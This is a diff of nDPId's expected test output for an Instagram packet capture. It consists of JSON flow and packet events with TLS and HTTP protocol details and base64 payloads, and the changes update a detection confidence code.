+01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908581,"flow_last_seen":1436720908634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4354,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1436720908634,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} 
+01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908572,"flow_last_seen":1436720908636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1868,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1436720908636,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} +01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908572,"flow_last_seen":1436720908638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1436720908638,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} +01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908576,"flow_last_seen":1436720908660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908660,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} 
+01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":402,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908576,"flow_last_seen":1436720908661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908661,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} 
+01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908577,"flow_last_seen":1436720908663,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} +01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908577,"flow_last_seen":1436720908665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908665,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1436720908719,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908719,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRgAAEABOq7AqABnwKgAZwMDAwcAAAAARQAAPLKEQABABvFRwKgAZ63CKBTA\/QG7ZKZcEQAAAACgAjkIlxQAAAIEBbQEAggKAAPulQAAAAABAwMG"} 
02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1436720908720,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908720,"pkt":"QPMIw47hABsv8H60CABFAAWqkOBAAFUGUh0fDV00wKgAZwG7g+MQ445PobbjVYAQANmoZAAAAQEICvAgso0AA+57FwMBBgAJWuxAFmWJOuMXXLFPa+ihsePS3XMy0YIQztBBVmLMKv7bKksLnHy6Qejj3IofgvBbzBtV3GqDkMg6uh0P6N7FwcSe3tUjgcGiijvn6K818Zp8xqjp0tEb5pWvqXYqObddd2Hnzu6vQfWb9eTm5eWBjMWaH+46WOkF+yLDu28OnCnI6DRA4hVUhPFmv3Y3Jc5EGy9h1liFAXpPz8RauF02nsY9w0LD3TtF0JwByoPONdeUPZq\/WKka9SPqVUAIaUqD+iiuPiB4iY\/P40454jR2ubUAx1KxalPDxCZcJOVc\/mRFMjjylf886\/qgnF5\/zNdIB+osc8LQ7+njijbpW6+nsd1r20QxY5h4iboPc5bOwlwaY54bOkKhUi3rW\/yK+SdRmOIbvY6QnNs\/NHnLztmSVepcsVQj4\/LAs3sQee2yV5Zb\/OKdnbNcoVz0fzHzanGF+shxmnBL7MHCUWI6dyfgrtdeHJw7AeiUY3i\/mTZNsE8HDXYtj4PZmBRSpw9Tn6yrOi8oCWZlu5KzIRGzRJtFphUHZ6meh5JLg+hn5njKZANgsGVL5D4VIgoF1kaCOaYkGXgkZUN4f977LcfvI6GMq+I5puCewiP+Uuk1kPF9pzskRav04M10TqsDM7GhlmoPVQK4OBUJ9tHagFf6IatPi0\/17iyM\/LjiFML0PoAxBFfvl5DWDm64B7S6wNuZznilyLl+dRCTX+DG4IWEZ9iWMuJz0q4h3NgjCjbVoEhcXrIzm79zTgYF1K\/Fc1eVQ5pDkZIk+MSfw+JmzqDNkO7KlRRDcuvw+93T8NghPFPmCMaGi36H+eJ8qZHgJQD6VyTq0u+kS7b7xcTR0rfQCJsFB5GAwMG7Gp3gleQk40HnR7gOPSTpCQbfSRM+5donNBgSWHGZa9A+e6lLq4NFCERiwzj3U\/o3rAI1FPY3nDbj4wb3EgILuovLCxScYhTNarC2IzSTHU8Qk8N2SV+q0qGc9KDK7Jyj+IHlvAecHsLgYXphxLiTsup\/3eR29a5fD0B54hNbSHf+QHisCGvO8syBPnMdbwGhHIhnTTwNn1eEHqk6X5WP24wp\/q9HBPEopbXKhKpIJHSzjJGb6QwaZFDvJ0eS8PBbauWDkSrvIOpQ+81F3KtLkj4QiFmXv6kUM6e\/ijm1X4ctGQCDMzfE6CL9kNIZ0KT10hk0pBqwVPBgsjzabFgBWuwkhXkJMqXx8tC1EU+7y29gsrs\/ybrD8eTd4mRW4AQWWxsx8SCg4RuBagiQndKzKvD7t\/D1UNx\/cjM+FPNHc3Vo6COyR4bKIxJFsFcqKxflWpQPrWlcHnstMeCf6fe7rHShYcn66kSCS9GJMM\/PUNJmbrAgWC5m7qX18BfYRtqglq81Hxihw61ZCMOoAsDBgvxxxkjs4uHIg0bxq+QIHC4jEm62Kc2GqcJIEifAbDIMGTrfg+zGbXs6fbA2wHWV\/6sG736+zvLX7Jbtdr+R3sSX9sMXEufLQEprD
fFP7rjDtjD6q3s32bdz6TPKsaKweTpBUQdUPpxrBp58LHYIfh7kBM6ZZ7B\/leOdLQ4iB0qa4hkq1hvJbOmBVgxwN8J6lLAiR2zfKtjyjIgh1PIEwm0tWG3PrpvEGPUu+zdVEzsubp+CEZmpQpom3JAd8mN1yHxpyrcTLFJkY\/8guFvDtth\/joA1HCjPx5dnKVrWK+v+DF0itobPJ17srGXjTUdxq+PcFTOSkogqyTZpAghuLdzESZm4BYIuVxTMgSSAIWua\/B9nB7ubZGXJW35Hmjvh2589ysVkb287bswERaCrOs6tPVp2NtqRIS7vXD6J\/TWsp5LCRdFcfNfT70AwbYVcnpBdE0+y3eeVEDxU"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942507,"flow_last_seen":1436720942507,"flow_idle_time":7580000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720942507,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -131,10 +130,10 @@ 02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1436720942509,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942509,"pkt":"QPMIw47hABsv8H60CABFAAW+7YZAADkGAKBcejCKwKgAZwBQolpM7h6Jzhvj2IAQAkvuxQAAAQEIClRk1HoAA\/vEO6\/U4C+0OWUTJgAb794HkAIhArOYgdkfiI22BCGjBFAjMJ7H5gWBudggbAYMBAg88QCbuhm0hAg9wQYHeJyZzGwFB7zDuEb1CIxUMRuZfliB7np0MYgeoY4J7+qgeYPabQ\/aB4IL9PHo+vR91\/N\/x\/EBC\/8A0ezA+Z8w+PUejh1dzuvQYmm4BAIYI\/EcE+jUD4nkjsnAhNA8wx5OA5aeINz\/AAUBr\/OAOALiPDMHk39If+VARek0ggL5idUhkPX2hAQrDqABo5\/wj6blcUMHps+4h4H9wU9ldOEBaMbWJMBg7F6bLf4ECwWUHgrMEFkEjMCoIwBEzYQLC4LK3AoAyviVQjybhI9r6wlsCgB94VnhTqRmcsioR5j39iByFiDkW+p4l8DUIG3Dyi4mQAZhCyClDE8GHwYPw7gzQ7QkYBnMHUC44nvArqGLzB9YQbQj7EXX6jh\/8eYjwIFiiz8Q2EAOV\/J\/x\/NHF6LrmV6Dxcv0cqD0MXc+CC9nEbBVQOPX2ggjHHvMvqNwABPCOeMwlwkwvyoIxB0cfSIC0DB7xZrUJVmM5BC0yIAV7Yl2YC3A5ZgUA\/KF+xEAWdXLIAuYgd+YS27EPvuMQOQnQJw3GzgZ9R+JmMzlA+JlcA0TD1iDIUoajMm\/tESS4X3XHjoOZyDMKfeEmMwvwcoyHZ\/uUUCTC2rUXHInKoObP2gYKzOtS8IzHhA8F3HuZYIEo5ZHzE3qLhzoY+YAWCiPcGZwkp7ejUc+gga3G1eIfdfedlAT5gj5EE6gdzz6iFTkFQjlEicGXPeeH8X\/AB\/ED\/5XpeIz7wA8TpK\/gPv6VSjOjn1MAi\/3MI+8EfcCE7HBEANXcACPv6wUqjgLgz8RDKgfEwYWFaUo4Fqf7VxCfaXmKxR3zcPJAAMAF9qAAtEUIRw00NEmM0hCDHA7h7DEMhnudgYhPg9oeAYfNLwrg51CVPEQAWcPg7EXLL9MBJSwx9YZNq1KYagWYA+h4H0K2CvpPdEDv8GNXZrxEphqeRmaBf0jG3TP4gIo7h8Qnc7HMEPIQ9MYgoBDKJnhXF36CJa2ICTAm1lHzqHqEuYAMKeeIR3BwBhHkwuRAYAYoDD\/AOBC+IR1Pf8A9f8AA\/h\/p\/8AL9DK4jiQmCE+p9faB5idQkYTPD0B59HC\/aAQO7qV3CYV1ZgDiovRHuVyAfrBFwZNPjFwKif1AWf2J2OENoUB+iZ4gniUx+IHTH6wBkeYwWEmDrCuR+YjiR4wICxwiF5JxELRFQLQCHzHzuBEEnDGTAEqWD+ShAN5cKZpAYRsmSxHSjO2xQ6w+HMTYnzC1FonyIOIR3AYBABDff8AyDZtfEVIYiKJhQDgP8z5DwYCUEHYxPeKKGKB4hDSL3QYgR+UAOxj6StiMylB2zD5KM65g7cfcXxmA8LHvAuoZ5hg8w+6uLzB6JH6GVH6dnXp4ev\/AAP5gIT\/AOFzqcLgd\/8Ajt
F6GeB6BT3gEe4YP39BC4Sk49RQhRqeIehOPMAz8Inhwtq4LXEJ1aUu\/TzAstcfbxB5v9TsR6HUP3QMI4jOnKgzrELSNTN1A5H7Qk3lxdJcFQrcADz6E8y+DmEIbgGJhOH3BbcIGziEwHPJ+I+E4CPabiALnOh9A4O4qjsRRPELQDgwRZyEPYQruIeB+5TMEqcJo\/MI7Idz6oBxMrQnuUnkCBt\/UBe8Q9RQ1j1p3cA0hfMfiH3CITwf\/NQnmD0KswQ\/+f8Ah\/D9IUFjf\/oTHEIClQz2qBAYII+oVHHD6KGByZqnhBDD49B1AYAdwdz3iimo9Dc4Row\/KI5J\/uOEEGO5YEPBioY1COYTPdCMjxANjAId+EI6EA2AahcCHIIVEDqIt8j7wQrjygpv6whzUCbmYRCBYNQWyVqMbJQ="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00821{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1436720942530,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720942530,"pkt":"ABsv8H60QPMIw47hCABFAAE4n8hAAEAGa\/HAqABnUlUaouLEAFAvtWVoUhBMjIAYFINNAAAAAQEICgAD+8pWC84nR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExNDE3MzQ5XzE2MTA0MjQ0NTI1NTk2MzhfMTU1OTA5NjE1Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtZy5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="} 
-00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11417349_1610424452559638_1559096152_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11417349_1610424452559638_1559096152_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7580000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1436720942580,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1436720942580,"pkt":"ABsv8H60QPMIw47hCABFAAEzOUlAAEAG0nXAqABnUlUaouLFAFD1YMTERbSUBYAYD2PW+wAAAQEICgAD+89WC83JR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMzc5Mjg0XzE2NTE0MTY3OTg0MDgyMTRfMTUyNTY0MTQ2Nl9uLmpwZyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWcuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7580000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11379284_1651416798408214_1525641466_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7580000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11379284_1651416798408214_1525641466_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
02389{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1436720942592,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAFAADkG3jJSVRqiwKgAZwBQ4sRSEEyML7VmbIAQAggFiAAAAQEIClYL0tgAA\/vKSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBUaHUsIDA5IEp1bCAyMDE1IDIxOjI4OjQ3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTE3NzgwDQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA5OjAyIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDA4NzQ5MDAwMDFlNjAwMDAwZmE3MzAwMDA2M2U0MDAwMGEyMzYwMTAwZTk2MDAxMDAxMmNjMDEwMDdkMTQwMjAwZGE1ZjAyMDAA\/9sAQwAHBwcHBwcMBwcMEQwMDBEXERERERceFxcXFxceJB4eHh4eHiQkJCQkJCQkKysrKysrMjIyMjI4ODg4ODg4ODg4\/9sAQwEJCQkODQ4ZDQ0ZOyghKDs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7\/8IAEQgEOAQ4AwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAQAAQIDBQYHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAAO9N4sXTDu15V0zXWqS6e